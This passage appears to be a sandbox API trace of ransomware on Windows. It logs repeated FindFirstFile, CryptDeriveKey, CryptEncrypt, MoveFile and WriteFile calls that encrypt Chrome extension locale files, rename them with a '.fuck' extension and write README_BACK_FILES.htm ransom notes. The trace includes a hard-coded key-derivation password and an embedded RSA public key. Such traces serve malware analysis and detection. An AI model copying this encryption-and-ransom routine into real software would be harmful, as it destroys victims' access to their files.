data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.fuck")) returned 1 [0250.445] CryptDestroyHash (hHash=0x2985a60) returned 1 [0250.445] CryptDestroyKey (hKey=0x2985860) returned 1 [0250.445] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.445] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.445] FindClose (in: hFindFile=0x2985f20 | out: hFindFile=0x2985f20) returned 1 [0250.445] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\readme_back_files.htm")) returned 0xffffffff [0250.445] AreFileApisANSI () returned 1 [0250.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.446] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.446] GetFileType (hFile=0x5d54) returned 0x1 [0250.446] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.449] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.449] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985d60 [0250.449] FindNextFileA (in: hFindFile=0x2985d60, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.449] FindNextFileA (in: hFindFile=0x2985d60, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.449] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.449] GetLastError () returned 0x0 [0250.449] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json")) returned 0x20 [0250.449] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json", dwFileAttributes=0x80) returned 1 [0250.450] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.450] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.452] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.452] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x28f5c60) returned 1 [0250.455] CryptCreateHash (in: hProv=0x28f5c60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.455] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.455] CryptHashData (hHash=0x2985ca0, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.455] CryptDeriveKey (in: hProv=0x28f5c60, Algid=0x6610, hBaseData=0x2985ca0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985d20) returned 1 [0250.455] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.455] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.455] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2940538) returned 1 [0250.456] CryptImportPublicKeyInfo (in: hCryptProv=0x2940538, dwCertEncodingType=0x1, pInfo=0x2935100*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935130*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935138*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985de0) returned 1 [0250.456] CryptEncrypt (in: hKey=0x2985de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.456] CryptEncrypt (in: hKey=0x2985de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2988f40*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2988f40*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.456] WriteFile (in: hFile=0x5d58, lpBuffer=0x2988f40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2988f40*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.457] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x102, lpOverlapped=0x0) returned 1 [0250.458] CryptEncrypt (in: hKey=0x2985d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x102, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.458] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.459] CloseHandle (hObject=0x5d5c) returned 1 [0250.459] CloseHandle (hObject=0x5d58) returned 1 [0250.459] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json"), bFailIfExists=0) returned 1 [0250.462] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json", dwFileAttributes=0x0) returned 1 [0250.463] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.gsg")) returned 1 [0250.465] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.fuck")) returned 1 [0250.466] CryptDestroyHash (hHash=0x2985ca0) returned 1 [0250.466] CryptDestroyKey (hKey=0x2985d20) returned 1 [0250.466] CryptReleaseContext (hProv=0x28f5c60, dwFlags=0x0) returned 1 [0250.466] FindNextFileA (in: hFindFile=0x2985d60, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.466] FindClose (in: hFindFile=0x2985d60 | out: hFindFile=0x2985d60) returned 1 [0250.466] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\readme_back_files.htm")) returned 0xffffffff [0250.466] AreFileApisANSI () returned 1 [0250.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.466] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.467] GetFileType (hFile=0x5d54) returned 0x1 [0250.467] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.468] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.468] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29859e0 [0250.469] FindNextFileA (in: hFindFile=0x29859e0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.469] FindNextFileA (in: hFindFile=0x29859e0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.469] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.469] GetLastError () returned 0x0 [0250.470] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json")) returned 0x20 [0250.470] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json", dwFileAttributes=0x80) returned 1 [0250.470] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.471] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.471] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.472] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2988fc8) returned 1 [0250.474] CryptCreateHash (in: hProv=0x2988fc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.474] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.474] CryptHashData (hHash=0x2985d20, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.474] CryptDeriveKey (in: hProv=0x2988fc8, Algid=0x6610, hBaseData=0x2985d20, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985f20) returned 1 [0250.474] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.474] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.475] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2988748) returned 1 [0250.475] CryptImportPublicKeyInfo (in: hCryptProv=0x2988748, dwCertEncodingType=0x1, pInfo=0x2934400*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934430*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934438*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985ca0) returned 1 [0250.475] CryptEncrypt (in: hKey=0x2985ca0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.475] CryptEncrypt (in: hKey=0x2985ca0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2988b88*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2988b88*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.475] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2988b88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2988b88*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.476] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x125, lpOverlapped=0x0) returned 1 [0250.477] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x125, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x130) returned 1 [0250.477] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x130, lpOverlapped=0x0) returned 1 [0250.478] CloseHandle (hObject=0x5d58) returned 1 [0250.478] CloseHandle (hObject=0x5d5c) returned 1 [0250.478] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json"), bFailIfExists=0) returned 1 [0250.481] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json", dwFileAttributes=0x0) returned 1 [0250.482] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.gsg")) returned 1 [0250.483] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.fuck")) returned 1 [0250.484] CryptDestroyHash (hHash=0x2985d20) returned 1 [0250.484] CryptDestroyKey (hKey=0x2985f20) returned 1 [0250.484] CryptReleaseContext (hProv=0x2988fc8, dwFlags=0x0) returned 1 [0250.484] FindNextFileA (in: hFindFile=0x29859e0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.484] FindClose (in: hFindFile=0x29859e0 | out: hFindFile=0x29859e0) returned 1 [0250.484] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\readme_back_files.htm")) returned 0xffffffff [0250.484] AreFileApisANSI () returned 1 [0250.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.484] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.485] GetFileType (hFile=0x5d54) returned 0x1 [0250.485] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.486] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.486] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985d20 [0250.487] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.487] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.487] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.487] GetLastError () returned 0x0 [0250.487] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json")) returned 0x20 [0250.487] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json", dwFileAttributes=0x80) returned 1 [0250.488] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 